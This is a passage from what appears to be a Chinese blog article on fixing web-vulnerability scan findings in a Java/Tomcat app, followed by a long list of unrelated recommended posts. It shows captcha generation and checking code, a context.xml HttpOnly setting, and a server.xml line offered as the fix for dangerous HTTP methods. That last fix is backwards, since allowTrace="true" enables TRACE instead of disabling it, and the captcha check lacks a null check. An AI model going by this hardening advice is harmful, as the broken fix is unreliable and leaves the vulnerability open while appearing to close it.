   <li>后台生成验证码</li> 
  </ul> 
  <pre><code class="prism language-java"> <span class="token annotation punctuation">@RequestMapping</span><span class="token punctuation">(</span>method <span class="token operator">=</span> RequestMethod<span class="token punctuation">.</span>GET<span class="token punctuation">,</span> value <span class="token operator">=</span> <span class="token string">"/getVerify"</span><span class="token punctuation">)</span>
    <span class="token keyword">public</span> <span class="token keyword">void</span> <span class="token function">getVerify</span><span class="token punctuation">(</span>HttpServletRequest request<span class="token punctuation">,</span> HttpServletResponse response<span class="token punctuation">)</span><span class="token punctuation">{</span>
        response<span class="token punctuation">.</span><span class="token function">setContentType</span><span class="token punctuation">(</span><span class="token string">"image/jpeg"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//设置相应类型,告诉浏览器输出的内容为图片</span>
        response<span class="token punctuation">.</span><span class="token function">setHeader</span><span class="token punctuation">(</span><span class="token string">"Pragma"</span><span class="token punctuation">,</span> <span class="token string">"No-cache"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//设置响应头信息，告诉浏览器不要缓存此内容</span>
        response<span class="token punctuation">.</span><span class="token function">setHeader</span><span class="token punctuation">(</span><span class="token string">"Cache-Control"</span><span class="token punctuation">,</span> <span class="token string">"no-cache"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        response<span class="token punctuation">.</span><span class="token function">setDateHeader</span><span class="token punctuation">(</span><span class="token string">"Expire"</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        RandomValidateCode randomValidateCode <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">RandomValidateCode</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">try</span> <span class="token punctuation">{</span>
            randomValidateCode<span class="token punctuation">.</span><span class="token function">getRandcode</span><span class="token punctuation">(</span>request<span class="token punctuation">,</span> response<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//输出验证码图片方法</span>
        <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">Exception</span> e<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            e<span class="token punctuation">.</span><span class="token function">printStackTrace</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
</code></pre> 
  <ul> 
   <li>验证码校验</li> 
  </ul> 
  <pre><code class="prism language-java">String checks <span class="token operator">=</span> request<span class="token punctuation">.</span><span class="token function">getParameter</span><span class="token punctuation">(</span><span class="token string">"checks"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">trim</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">toLowerCase</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		HttpSession session <span class="token operator">=</span> request<span class="token punctuation">.</span><span class="token function">getSession</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		String verify <span class="token operator">=</span> <span class="token punctuation">(</span>String<span class="token punctuation">)</span> session<span class="token punctuation">.</span><span class="token function">getAttribute</span><span class="token punctuation">(</span><span class="token string">"RANDOMVALIDATECODEKEY"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		String verityNew <span class="token operator">=</span> verify<span class="token punctuation">.</span><span class="token function">toLowerCase</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token comment">//将session中的验证码记录和用户提交的值进行比较</span>
		<span class="token comment">//一致移除session记录，错误抛出异常</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>checks<span class="token punctuation">.</span><span class="token function">equals</span><span class="token punctuation">(</span>verityNew<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
			<span class="token keyword">throw</span> <span class="token keyword">new</span> <span class="token class-name">AuthenticationServiceException</span><span class="token punctuation">(</span><span class="token string">"VerityException"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
			session<span class="token punctuation">.</span><span class="token function">removeAttribute</span><span class="token punctuation">(</span><span class="token string">"RANDOMVALIDATECODEKEY"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span>
</code></pre> 
  <h2 id="4">4. Cookie中未设HttpOnly标识</h2> 
  <pre><code>  tomcat context.xml文件中配置<Context useHttpOnly="true">
</code></pre> 
  <h2 id="5">5.危险的HTTP方法未禁用</h2> 
  <p>tomcat server.xml文件中配置</p> 
  <pre><code><Connector connectionTimeout="20000" port="8080" protocol="HTTP/1.1" redirectPort="8443" allowTrace="true"/>
</code></pre> 
  <p>至此整个安全漏洞防御告一段落，当然还有好多问题，大家有什么问题可以在下面留言。<br> 希望今天的自己比昨天更加进步。</p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1669514524677464064"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(安全,java,xss攻击和防御,https)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1773616671278301184.htm"
                           title="美易官方：盘前道指期货涨0.5%，游戏驿站跌逾15%" target="_blank">美易官方：盘前道指期货涨0.5%，游戏驿站跌逾15%</a>
                        <span class="text-muted">美股投资</span>
<a class="tag" taget="_blank" href="/search/%E8%B4%A2%E7%BB%8F/1.htm">财经</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E6%95%B0%E6%8D%AE/1.htm">大数据</a><a class="tag" taget="_blank" href="/search/%E6%96%B0%E6%B5%AA%E5%BE%AE%E5%8D%9A/1.htm">新浪微博</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1/1.htm">微信</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%85%AC%E4%BC%97%E5%B9%B3%E5%8F%B0/1.htm">微信公众平台</a><a class="tag" taget="_blank" href="/search/%E7%99%BE%E5%BA%A6/1.htm">百度</a><a class="tag" taget="_blank" href="/search/%E9%87%91%E8%9E%8D/1.htm">金融</a>
                        <div>在股市开盘前的交易时段，道指期货上涨了0.5%，而游戏驿站（GameStop）的股价却出现了大幅下跌，跌幅超过15%。这一市场动态引发了投资者的广泛关注，也反映了当前股市的复杂性和不确定性。美股股指期货周三盘前走强，交易员为季度末的再平衡做准备。本周因假期而缩短，美国将公布关键通胀数据。道指期货涨0.5%，标普500指数期货涨0.6%，纳指期货涨0.5%。德国DAX指数涨0.4%，英国富时100指</div>
                    </li>
                    <li><a href="/article/1773614820973674496.htm"
                           title="2023-02-16" target="_blank">2023-02-16</a>
                        <span class="text-muted">执剑饮烈酒</span>

                        <div>1、开心点，反正谁也别想活着离开这个世界。——朱德庸2、我一直以为爱的反义词是不爱，直到现在我才明白，爱的反义词是遗忘。——《寻梦环游记》3、人生的最高境界是佛为心，道为骨，儒为表，大度看世界。技在手，能在身，思在脑，从容过生活。——南怀瑾4、如果一个民族沦落到，只剩下把升官发财当成最终目标和追求的时候，那么这个民族就危险了，一旦金钱和权利成了唯一的信仰，那将是悲哀的。——鲁迅5、人和人如果不在一</div>
                    </li>
                    <li><a href="/article/1773613272952537088.htm"
                           title="【Python】一文详细介绍 py格式 文件" target="_blank">【Python】一文详细介绍 py格式 文件</a>
                        <span class="text-muted">高斯小哥</span>
<a class="tag" taget="_blank" href="/search/Python%E5%9F%BA%E7%A1%80%E3%80%90%E9%AB%98%E8%B4%A8%E9%87%8F%E5%90%88%E9%9B%86%E3%80%91/1.htm">Python基础【高质量合集】</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E6%96%B0%E6%89%8B%E5%85%A5%E9%97%A8/1.htm">新手入门</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a>
                        <div>【Python】一文详细介绍py格式文件个人主页：高斯小哥高质量专栏：Matplotlib之旅：零基础精通数据可视化、Python基础【高质量合集】、PyTorch零基础入门教程希望得到您的订阅和支持~创作高质量博文(平均质量分92+)，分享更多关于深度学习、PyTorch、Python领域的优质内容！（希望得到您的关注~）文章目录一、py格式文件简介二、如何创建和编辑py格式文件三、如何运行py</div>
                    </li>
                    <li><a href="/article/1773611795592839168.htm"
                           title="《昼颜》里的日本女人：相遇要万种风情，分手要残忍绝情" target="_blank">《昼颜》里的日本女人：相遇要万种风情，分手要残忍绝情</a>
                        <span class="text-muted">迷影咖啡</span>

                        <div>作者：迷之菌子神奇菇迷影咖啡：一本正经做烘焙，胡说八道聊电影漫天萤火虫消散之时良宵就将过去，人们也说含苞待放的花蕾总会开了又谢，因紧紧相拥而面红耳赤的躯体，便是我们经历过这热爱的证明。夫妻关系介绍《昼颜》是2014年电视剧《昼颜：工作日下午三点的恋人们》的续集，故事发在电视剧情节结束的三年后，讲述了已经恢复独身的纱和偶然与曾经的出轨对象北野重逢后再次陷入感情漩涡的故事。《昼颜》制作灵感源自利佳子在</div>
                    </li>
                    <li><a href="/article/1773610251875057664.htm"
                           title="Android和IOS应用开发-Flutter应用让屏幕在 app 运行期间保持常亮的方法" target="_blank">Android和IOS应用开发-Flutter应用让屏幕在 app 运行期间保持常亮的方法</a>
                        <span class="text-muted">江上清风山间明月</span>
<a class="tag" taget="_blank" href="/search/Flutter/1.htm">Flutter</a><a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/ios/1.htm">ios</a><a class="tag" taget="_blank" href="/search/flutter/1.htm">flutter</a><a class="tag" taget="_blank" href="/search/KeepAlive/1.htm">KeepAlive</a><a class="tag" taget="_blank" href="/search/%E5%B1%8F%E5%B9%95%E5%B8%B8%E4%BA%AE/1.htm">屏幕常亮</a><a class="tag" taget="_blank" href="/search/wakelock/1.htm">wakelock</a><a class="tag" taget="_blank" href="/search/%E7%86%84%E5%B1%8F/1.htm">熄屏</a>
                        <div>文章目录Flutter应用让屏幕在app运行期间保持常亮的方法方法一：使用系统插件方法二：使用Widgets注意事项Flutter应用让屏幕在app运行期间保持常亮的方法在Flutter开发中，可以使用以下两种方法让屏幕在app运行期间保持常亮：方法一：使用系统插件Flutter社区中已经有很多相关插件可供使用，比如wakelock:https://pub.dev/packages/wakeloc</div>
                    </li>
                    <li><a href="/article/1773604729713131520.htm"
                           title="我喝醉了，但是与你无关" target="_blank">我喝醉了，但是与你无关</a>
                        <span class="text-muted">Z先生的日记本</span>

                        <div>2019年04月10号晚上我和一个朋友喝酒了，彻彻底底的喝醉了，喝到短片，事后我问L，我说我喝醉了之后，都发生了什么，L没有告诉我详情，但是跟我说了大致，他说我跟他一直聊天，说自己小的时候的事，说自己爸妈的事，说自己现在过得很苦可能，确实是喝醉了酒，才会毫无防备的跟其他人说这些吧。L还说感觉我过得很苦，很心疼。醉了酒之后还哭了，想想还真是丢人一年前，在宿舍也有一瓶红酒，那是舍友出去拉赞助时候，友商</div>
                    </li>
                    <li><a href="/article/1773603578330546176.htm"
                           title="Flink中的SQL Client和SQL Gateway" target="_blank">Flink中的SQL Client和SQL Gateway</a>
                        <span class="text-muted">BigDataMLApplication</span>
<a class="tag" taget="_blank" href="/search/flink/1.htm">flink</a><a class="tag" taget="_blank" href="/search/flink/1.htm">flink</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/gateway/1.htm">gateway</a>
                        <div>Flink中的SQLClient和SQLGateway对比目录定义基本原理适用场景主要区别常用运维命令示例官方链接正文1.定义SQLClient：FlinkSQLClient是一种用于提交和执行FlinkSQL语句的命令行界面或图形界面工具。SQLGateway：FlinkSQLGateway是一个独立的服务，它允许客户端通过RESTfulAPI将SQL查询提交到Flink集群。2.基本原理SQL</div>
                    </li>
                    <li><a href="/article/1773602697044361216.htm"
                           title="浪潮 M5系列服务器IPMI无法监控存储RAID卡问题." target="_blank">浪潮 M5系列服务器IPMI无法监控存储RAID卡问题.</a>
                        <span class="text-muted">Songxwn</span>
<a class="tag" taget="_blank" href="/search/%E7%A1%AC%E4%BB%B6%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">硬件服务器</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a>
                        <div>简介浪潮的M5代服务器，可能有WebBMC无法查看存储RAID/SAS卡状态的情况，可以通过以下方式修改。修改完成后重启BMC即可生效。ESXiIPMITools使用：https://songxwn.com/ESXi8_IPMI/（Linux也可以直接使用）Linux/ESXiIPMITool下载：https://songxwn.com/file/ipmitoolWindows下载：https:/</div>
                    </li>
                    <li><a href="/article/1773597032066383872.htm"
                           title="通俗易懂：MySQL中如何设置只读实例并确保数据一致性？" target="_blank">通俗易懂：MySQL中如何设置只读实例并确保数据一致性？</a>
                        <span class="text-muted">大龄下岗程序员</span>
<a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a>
                        <div>在MySQL中设置只读实例主要应用于构建高可用性和扩展性的数据库环境，通常是为了分担读取负载或者用于备份和灾难恢复。以下是创建MySQL只读实例并确保数据一致性的基本步骤：1.创建并配置只读实例-主从复制设置-首先，你需要有一个主数据库实例（Master）负责接收所有的写操作。-创建一个或多个从数据库实例（Slave），并将它们配置为主数据库的复制品。这通常通过设置主从复制（Replication</div>
                    </li>
                    <li><a href="/article/1773596671511429120.htm"
                           title="拼多多纸巾推荐：品质与性价比的完美结合" target="_blank">拼多多纸巾推荐：品质与性价比的完美结合</a>
                        <span class="text-muted">氧惠帮朋友一起省</span>

                        <div>拼多多纸巾推荐拼多多纸巾返现怎么做在我们的日常生活中，纸巾已经成为不可或缺的用品。无论是在家庭、办公室还是旅途中，纸巾都是我们随时随地需要的物品。随着电商平台的兴起，越来越多的人选择在网上购买纸巾。其中，拼多多作为国内知名的电商平台之一，以其独特的社交电商模式和实惠的价格吸引了大量用户。今天，我们就来探讨如何在拼多多上选择品质优良、性价比高的纸巾，以及如何通过一些小技巧来获取更多的优惠。一、品质与</div>
                    </li>
                    <li><a href="/article/1773596544394657792.htm"
                           title="5月8日盘前提示：维持短期可以操作到下周二左右的判断，重个股轻指数" target="_blank">5月8日盘前提示：维持短期可以操作到下周二左右的判断，重个股轻指数</a>
                        <span class="text-muted">九命_猫妖</span>

                        <div>大盘：消息面。取消境外投资者额度限制，这个长线利好股市，短期影响不大，因为3000亿额度只用了1/3。额度本来就够用。走势看，昨天缩量横盘，走的还算中规中矩，近期一直弱势的次新股走势较强，前期强势股京威股份、光大嘉宝等跌停，由此判断市场还是存量博弈的市场，震荡是市场的主基调。维持短期可以操作到下周二左右的判断。下周后半段震荡回调的概率较高。思路：短期重个股轻指数行业和个股：物联网行业有利好，关注下</div>
                    </li>
                    <li><a href="/article/1773594136444731392.htm"
                           title="word字号和mathtype磅值关系及批量修改" target="_blank">word字号和mathtype磅值关系及批量修改</a>
                        <span class="text-muted">小铁匠-Ma</span>
<a class="tag" taget="_blank" href="/search/office%E5%B0%8F%E6%8A%80%E5%B7%A7/1.htm">office小技巧</a><a class="tag" taget="_blank" href="/search/%E7%BB%8F%E9%AA%8C%E5%88%86%E4%BA%AB/1.htm">经验分享</a>
                        <div>word字号和mathtype磅值关系及批量修改1.字号与磅值关系字号「八号」对应磅值5字号「七号」对应磅值5.5字号「小六」对应磅值6.5字号「六号」对应磅值7.5字号「小五」对应磅值9字号「五号」对应磅值10.5字号「小四」对应磅值12字号「四号」对应磅值14字号「小三」对应磅值15字号「三号」对应磅值16字号「小二」对应磅值18字号「二号」对应磅值22字号「小一」对应磅值24字号「一号」对应</div>
                    </li>
                    <li><a href="/article/1773591757104152576.htm"
                           title="现在的婚姻是: 高彩礼和诸多要求让感情越来越淡漠" target="_blank">现在的婚姻是: 高彩礼和诸多要求让感情越来越淡漠</a>
                        <span class="text-muted">朦蒙哒</span>

                        <div>很多人搞不明白为什么现在的人对婚姻的质量要求那么高可就是维持不了多久时间，有不少人的婚姻是用礼金堆起来的，但恰恰是这些人最容易夫妻感情出问题导致离婚收场。现在的婚姻让年轻人失望，年轻人为什么对婚姻失望甚至没了渴望，无非就是这几个原因01彩礼高了感情淡了我们都知道，结婚要的高彩礼把很多年轻人给搞怕了，搞得很多年轻人都不敢结婚生子了，可以说彩礼高了让很多男女都失去了真感情，就算能在一起也只是男人需要老</div>
                    </li>
                    <li><a href="/article/1773588094755340288.htm"
                           title="美团自动配送车2024春季招聘 | 社招专场" target="_blank">美团自动配送车2024春季招聘 | 社招专场</a>
                        <span class="text-muted">美团技术团队</span>

                        <div>关于美团自动配送团队美团自动配送以自研L4级自动驾驶软硬件技术为核心，与美团即时零售业务结合，形成满足公开道路、校园、社区、工业园区等室外全场景下的自动配送整体解决方案。美团自动配送团队成立于2016年，团队成员来自于Waymo、Cruise、Pony.ai、泛亚等自动驾驶行业头部公司，自动驾驶技术团队博士占比高达30%，依靠视觉、激光等传感器，实时感知预测周围环境，通过高精地图定位和智能决策规划</div>
                    </li>
                    <li><a href="/article/1773585584300818432.htm"
                           title="下载Android源码" target="_blank">下载Android源码</a>
                        <span class="text-muted">赛非斯</span>

                        <div>repoinit-uhttps://mirrors.tuna.tsinghua.edu.cn/git/AOSP/platform/manifest-bandroid-10.0.0_r411.首先下载repo：a）终端运行gitclonegit://codeaurora.org/tools/repo.gitb）mkdir~/binc）拷贝repo到~/bin下面，修改repo权限，chmoda+x~</div>
                    </li>
                    <li><a href="/article/1773585329924669440.htm"
                           title="读思001 ‖ 变负能为正能，变压力为动力" target="_blank">读思001 ‖ 变负能为正能，变压力为动力</a>
                        <span class="text-muted">你不懂夜的黑</span>

                        <div>今天起开始写一个言说文集连载，重点为读写思考收获和感想，也收录生活和工作中开悟到的点滴，仍然是一个碎片式的思考积累。希望这样的思考能启迪我的生活智慧，开悟我的思想境界，也算是一个修心的过程吧。这个连载不定期更新，重在积累生活和工作中的随思碎思，或许也是一厢情愿的一个梦。也或许这个梦是我坚持说下去的一个重要理由。读思001变负能为正能，变压力为动力1从来没有一种哲学能解决一切问题，也从来没有一种药能</div>
                    </li>
                    <li><a href="/article/1773582305621770240.htm"
                           title="华为OD机试 - 单向链表中间节点（Java & JS & Python & C & C++）" target="_blank">华为OD机试 - 单向链表中间节点（Java & JS & Python & C & C++）</a>
                        <span class="text-muted">华为OD题库</span>
<a class="tag" taget="_blank" href="/search/%E5%8D%8E%E4%B8%BAod/1.htm">华为od</a><a class="tag" taget="_blank" href="/search/%E9%93%BE%E8%A1%A8/1.htm">链表</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>须知哈喽，本题库完全免费，收费是为了防止被爬，大家订阅专栏后可以私信联系退款。感谢支持文章目录须知题目描述输出描述解析代码题目描述给定一个单链表L，请编写程序输出L中间结点保存的数据。如果有两个中间结点，则输出第二个中间结点保存的数据。例如：给定L为1→7→5，则输出应该为7；给定L为1→2→3→4，则输出应该为3；输入描述每个输入包含1个测试用例。每个测试用例：第一行给出链表首结点的地址、结点总</div>
                    </li>
                    <li><a href="/article/1773581925500387328.htm"
                           title="信任" target="_blank">信任</a>
                        <span class="text-muted">饮冰伊乔</span>

                        <div>随着社会的发展，微信和支付宝交易给人们带来了极大的方便，越来越多的人出门都只选择拿一部手机即可，方便安全，可昨天我就遇到了一件比较尴尬的事。昨天傍晚，我从公司出来，感觉有点饿，决定索性吃了饭再回去，来到去过几次的一个店里，如往常一样叫了餐，当时店里吃饭的不多，老板麻利的先去做了，正要扫微信付账的时候发现手机没电了，迷之尴尬，我只好跟老板说不用做了，手机没电了，我身上又没现金，付不了帐了。老板娘很热</div>
                    </li>
                    <li><a href="/article/1773581546637295616.htm"
                           title="《对我而言危险的他》：“假千金”归来，携手神秘霸总共破迷局" target="_blank">《对我而言危险的他》：“假千金”归来，携手神秘霸总共破迷局</a>
                        <span class="text-muted">入骨影评</span>

                        <div>由樊治欣李墨之主演的都市悬疑爱情剧《对我而言危险的他》在网上平台一次性播出全集。虽然是个小成本网剧，呈现出来的效果却十分有诚意。剧中从车祸到坠海、再到徒手灭火等惊险场面都是实景拍摄和主演们的无替身上场。说起樊治欣这个名字可能大家都不熟悉，但提起他演过的剧，大家都不陌生。饰演过《暗格里的秘密》中的学长苏柏从的樊治欣在这部剧中饰演霸总严星呈，即便同样戴着眼镜，却给人不一样的观感。该剧主要讲述了女主沈漫</div>
                    </li>
                    <li><a href="/article/1773581042041552896.htm"
                           title="男人请珍惜十六七岁陪在你身边的女孩吧" target="_blank">男人请珍惜十六七岁陪在你身边的女孩吧</a>
                        <span class="text-muted">小朋友嘿哈</span>

                        <div>你相信那种从校服到婚纱的爱情吗。01朋友阿伟18岁的时候就是一混混，放学不是和这个学校的学生约架，就是那个小弟被欺负了要为此出头，溜冰场上看谁不顺眼，一个字：打。当然，放学蹲点泡妞是常事，看到这个学生妹浓妆艳抹，搭讪，看到那个前凸后翘的，搭讪。阿伟也不例外，他说：“我当时和几个兄弟在学校后门的小卖部抽烟，姗姗背着双肩背包，扎着马尾辫，看到我们几个混混有些害怕的低着头快步走过我们面前，那时候我在想啊</div>
                    </li>
                    <li><a href="/article/1773578026081124352.htm"
                           title="学习JavaEE的日子 Day32 线程池" target="_blank">学习JavaEE的日子 Day32 线程池</a>
                        <span class="text-muted">A 北枝</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0JavaEE/1.htm">学习JavaEE</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/java-ee/1.htm">java-ee</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B%E6%B1%A0/1.htm">线程池</a>
                        <div>Day32线程池1.引入一个线程完成一项任务所需时间为：创建线程时间-Time1线程中执行任务的时间-Time2销毁线程时间-Time32.为什么需要线程池(重要)线程池技术正是关注如何缩短或调整Time1和Time3的时间，从而提高程序的性能。项目中可以把Time1，T3分别安排在项目的启动和结束的时间段或者一些空闲的时间段线程池不仅调整Time1，Time3产生的时间段，而且它还显著减少了创建</div>
                    </li>
                    <li><a href="/article/1773576128875790336.htm"
                           title="你之所以胖，可能是因为小时候发生这件事！还不赶快甩锅" target="_blank">你之所以胖，可能是因为小时候发生这件事！还不赶快甩锅</a>
                        <span class="text-muted">周围_5d19</span>

                        <div>通常，我们认为，“肥胖”主要是由于饮食不节制、不经常运动等等因素引起的。但最近，我国学者开展的一项针对6到18岁儿童青少年、随访长达十年的代谢综合征研究结果，在权威国际期刊发表。研究发现，儿童的肥胖和超重与睡眠密切相关，儿童、青少年时期睡眠不好，成人后也更容易患心血管疾病。那么，为什么儿童青少年睡眠不足会导致肥胖呢？今天就带大家一探究竟。儿童青少年肥胖的现状如何？近日，一项刊载在医学权威期刊《柳叶</div>
                    </li>
                    <li><a href="/article/1773573233237360640.htm"
                           title="淘宝天猫38节活动时间和玩法，2024年焕新周满减优惠多少" target="_blank">淘宝天猫38节活动时间和玩法，2024年焕新周满减优惠多少</a>
                        <span class="text-muted">小小编007</span>

                        <div>在2024年，淘宝天猫平台即将迎来一年一度的38节活动，这是广大消费者们翘首以待的购物狂欢节。在这篇文章中，我们将为您详细解读淘宝天猫38节活动的时间安排和玩法，以及2024年焕新周的满减优惠力度。一、淘宝天猫38节活动时间2024年淘宝天猫38节活动将于2月28日正式启动，持续至3月8日，为期10天。活动期间，消费者们可以尽情享受各种优惠折扣、满减活动以及限时秒杀，尽情释放购物热情。2024淘宝</div>
                    </li>
                    <li><a href="/article/1773572854445572096.htm"
                           title="感恩日志" target="_blank">感恩日志</a>
                        <span class="text-muted">圆施</span>

                        <div>张新丽2019年8月16日感恩日志：1.感恩天地滋养万物；感恩国家恩惠护佑；感恩父母养育深恩。2.感恩尊重为平台源头付出的所有人事物。3.感恩红斌、孙萍清晨7点开车来接我和小姨去安宁渠采摘。4.感恩小姨和小姨夫亲自采摘还带我们去瓜地品尝，第一次这么吃好甜啊，忘掉了炎热消了暑，拍下了瞬间，分享着快乐，带给大家。4.感恩整理收拾好小姨给大家利用午休蒸苞米。5.感恩去接爸妈参加沙龙。6.感恩祝福两位伙伴</div>
                    </li>
                    <li><a href="/article/1773571984861495296.htm"
                           title="llama.cpp 编译安装@Ubuntu" target="_blank">llama.cpp 编译安装@Ubuntu</a>
                        <span class="text-muted">skywalk8163</span>
<a class="tag" taget="_blank" href="/search/%E9%A1%B9%E7%9B%AE%E5%AE%9E%E8%B7%B5/1.htm">项目实践</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/llama/1.htm">llama</a><a class="tag" taget="_blank" href="/search/ubuntu/1.htm">ubuntu</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                        <div>在Kylin和Ubuntu编译llama.cpp，具体参考：llama模型c语言推理@FreeBSD-CSDN博客现在代码并编译：gitclonehttps://github.com/ggerganov/llama.cppcdllama.cppmkdirbuildcdbuildcmake..cmake--build.--configRelease#可选安装makeinstall#或可选添加路径ex</div>
                    </li>
                    <li><a href="/article/1773569827596730368.htm"
                           title="黔东南——苗年（一）" target="_blank">黔东南——苗年（一）</a>
                        <span class="text-muted">非常道yw</span>

                        <div>苗年是雷山县苗族同胞最隆重的民族传统节日，也是苗族人一年中庆祝丰收和最重要的祭祀性的日子，更是雷山苗族一年里劳作的结束和欢乐的开始。如同汉族的春节。节日期间，各村寨都要举行跳芦笙、篮球赛、斗牛、赛马、斗鸟、铜鼓舞、篝火晚会等民间传统娱乐活动。苗年也是最集中地展示苗族服饰、银饰、手工艺美术等有形文化的节日，时间大都在农历十月。苗族认为，一年只有热、冷两个季节，热季和冷季交替的农历十月，既是热季的结束</div>
                    </li>
                    <li><a href="/article/1773569717865349120.htm"
                           title="SpringMVC设置全局异常处理器" target="_blank">SpringMVC设置全局异常处理器</a>
                        <span class="text-muted">水岸齐天</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a>
                        <div>文章目录背景分析使用@ControllerAdvice（@RestControllerAdvice）+@ExceptionHandler实现全局异常全局异常处理-多个处理器匹配顺序存在一个类中存在不同的类中对于过滤器和拦截器中的异常，有两种思路可以考虑背景在项目中我们有需求做一个全局异常处理，来规范所有出去的异常信息。参考：官方文档分析首先ControllerAdvice(RestControll</div>
                    </li>
                    <li><a href="/article/1773569448767193088.htm"
                           title="为什么说仪式和习惯非常重要？" target="_blank">为什么说仪式和习惯非常重要？</a>
                        <span class="text-muted">章鱼老师zy</span>

                        <div>这是章鱼姐第【40】篇原创文章，日更计划第【37/100】天。阅读张萌萌姐【精力管理手册】第【6/7】章。一阅读摘要这一章萌姐讲到了习惯的重要性，为什么说养成一个习惯很重要？如何养成一个好习惯？如何建立自己的仪式感？二金句精力管理最重要的是产生什么效果。当你想做却没有动力去做一件事情时，你就应该把它养成习惯。习惯可以帮我们创造稳定框架。对于那些特别考验意志的事情，我们应该先行后思。三思考题，萌姐讲</div>
                    </li>
                    <li><a href="/article/1773569321646227456.htm"
                           title="安神的投资札记——指数跟踪周报（20220602）" target="_blank">安神的投资札记——指数跟踪周报（20220602）</a>
                        <span class="text-muted">echo安神</span>

                        <div>本周关键词：缩表上周调整过后，本周又反弹了。最近创业板好活跃，跌的时候跌得凶，涨的时候也涨得猛。底部特征明显。上证50，0.99%；沪深300，2.21%；中证100，1.85%；中证500，3.03%；深证100，3.71%；创业板指数，5.85%；中证1000，3.75%。美联储6月1日开启缩表，每月总计减持475亿美元美国国债和MBS（抵押贷款支持证券），并将在3个月后提高缩表上限至每月95</div>
                    </li>
                    <li><a href="/article/1773563772531703808.htm"
                           title="社交电商是什么意思通俗的说" target="_blank">社交电商是什么意思通俗的说</a>
                        <span class="text-muted">氧惠好项目</span>

